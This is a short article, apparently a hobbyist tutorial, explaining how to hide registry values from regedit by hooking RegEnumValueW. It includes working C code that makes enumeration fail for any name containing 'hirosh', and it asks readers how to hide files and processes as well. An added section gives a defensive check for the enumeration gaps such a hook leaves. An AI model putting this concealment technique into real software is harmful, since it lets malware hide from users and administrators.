Introduction
This article explains how to hide a registry string from regedit by hooking the RegEnumValueW API. In this article there is a function that hooks APIs, called HookAPICalls. I am not the author of that function - I got it from some website whose name I forget. Thanks to the author of that function. The function that replaces RegEnumValueW is given below.
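    LONG MyRegEnumValue(HKEY hKey,
                        DWORD dwIndex,
                        LPWSTR lpValueName,
                        LPDWORD lpcValueName,
                        LPDWORD lpReserved,
                        LPDWORD lpType,
                        LPBYTE lpData,
                        LPDWORD lpcbData)
    {
        LONG ret;
        /* Pointer to the original RegEnumValueW, taken from the hook table (OrigFn). */
        RegEnumValueWtype oldfn = (RegEnumValueWtype)RegDLL_Hooks.Functions[0].OrigFn;
        char ss[10];

        /* Call the original API first, so the caller's buffers are filled in. */
        ret = oldfn(hKey, dwIndex, lpValueName, lpcValueName, lpReserved, lpType, lpData, lpcbData);

        /* Convert the returned value name to ANSI for the substring test. */
        WideCharToMultiByte(CP_ACP, 0, lpValueName, -1, ss, 10, NULL, NULL);

        /* Return 1 (ERROR_INVALID_FUNCTION) when the name contains the marker. */
        if (strstr(ss, "hirosh") != NULL)
            return 1;
        else
            return ret;
    }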
This function simply checks lpValueName for the string "hirosh" and, if it is found, returns 1. That means the function has not completed successfully, so regedit will not display any string that contains the word "hirosh".
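A consistency check a defender can run against this kind of hook, given here as an added example that is not part of the original article: it probes every index below the value count that RegQueryInfoKeyW reports, keeps going after a failure, and records each failing index together with whatever name the call left in the buffer. The `enum_fn` adapter, `find_enum_gaps`, `struct gap` and the sample value names are assumptions made for illustration, and the check assumes the count query itself is not hooked.

```c
#include <stddef.h>
#include <wchar.h>

/* Win32 status codes, defined locally so this builds without <windows.h>. */
#define ERROR_SUCCESS   0L
#define ERROR_MORE_DATA 234L
#define NAME_CAP        64

/* Hypothetical adapter: on Windows, a thin wrapper around RegEnumValueW. */
typedef long (*enum_fn)(unsigned long index, wchar_t *name, size_t cap);
struct gap { unsigned long index; long status; wchar_t leaked[NAME_CAP]; };

/* Probe every index below count (cValues from RegQueryInfoKeyW) without
 * stopping at a failure; record failing indices and any leftover name.
 * Returns the total number of gaps, even if more than max were found. */
size_t find_enum_gaps(enum_fn fn, unsigned long count, struct gap *out, size_t max)
{
    size_t n = 0;
    for (unsigned long i = 0; i < count; i++) {
        wchar_t name[NAME_CAP] = {0};          /* zeroed so leftovers show */
        long st = fn(i, name, NAME_CAP);
        if (st == ERROR_SUCCESS || st == ERROR_MORE_DATA)
            continue;                          /* normal enumeration result */
        if (n < max) {
            name[NAME_CAP - 1] = L'\0';        /* never trust the terminator */
            out[n].index = i;
            out[n].status = st;
            wcscpy(out[n].leaked, name);
        }
        n++;
    }
    return n;
}

/* Constructed sample: four value names, one containing the article's marker. */
static const wchar_t *sample[] = { L"Path", L"hirosh_run", L"Version", L"Updater" };

/* Unhooked enumeration over the sample. */
long clean_enum(unsigned long i, wchar_t *name, size_t cap)
{
    if (i >= 4 || wcslen(sample[i]) >= cap) return 259L; /* ERROR_NO_MORE_ITEMS */
    wcscpy(name, sample[i]);
    return ERROR_SUCCESS;
}

/* Mirrors the article's MyRegEnumValue: real call first, then return 1. */
long hooked_enum(unsigned long i, wchar_t *name, size_t cap)
{
    long st = clean_enum(i, name, cap);
    return wcsstr(name, L"hirosh") ? 1L : st;
}
```

Because a key's value count can change between the two calls, treat a reported gap as a lead to confirm against an offline copy of the hive.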
API hooking is a powerful tool. Using it we can also hide files and processes from the OS. However, I don't know which APIs must be hooked to achieve this. If anybody knows this, please help me.
I checked this program on Windows XP. regedit is OK, but when I run msconfig it displays an error. I don't know what the problem is, so if anybody knows this, please help me. I am not experienced in API hooking, so I am just experimenting with this.